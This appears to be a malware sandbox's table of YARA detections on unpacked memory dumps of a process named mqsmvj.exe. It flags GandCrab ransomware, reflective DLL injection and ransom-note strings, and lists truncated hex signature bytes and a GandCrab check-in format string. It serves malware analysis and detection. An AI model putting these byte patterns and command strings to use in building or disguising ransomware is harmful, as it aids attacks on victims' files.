15.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
3.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
3.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
3.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
3.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
3.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
3.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
3.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
39.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
39.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
25.3.mqsmvj.exe.3490000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.3.mqsmvj.exe.3490000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.3.mqsmvj.exe.3970000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
35.3.mqsmvj.exe.3970000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.3.mqsmvj.exe.3970000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.3.mqsmvj.exe.3970000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.3.mqsmvj.exe.3490000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.3.mqsmvj.exe.3970000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.3.mqsmvj.exe.3970000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.3.mqsmvj.exe.3490000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.3.mqsmvj.exe.3490000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.mqsmvj.exe.3490000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
30.3.mqsmvj.exe.3470000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
30.3.mqsmvj.exe.3470000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
30.3.mqsmvj.exe.3470000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.3.mqsmvj.exe.3470000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
30.3.mqsmvj.exe.3470000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.3.mqsmvj.exe.3470000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
35.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
35.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
35.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
34.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
36.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
36.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
36.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
36.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
36.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
36.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
23.2.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
23.2.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
23.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
23.2.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
23.2.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
23.2.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
23.2.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
37.3.mqsmvj.exe.3bc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
37.3.mqsmvj.exe.3bc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
37.3.mqsmvj.exe.3bc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
37.3.mqsmvj.exe.3bc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
37.3.mqsmvj.exe.3bc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
37.3.mqsmvj.exe.3bc0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
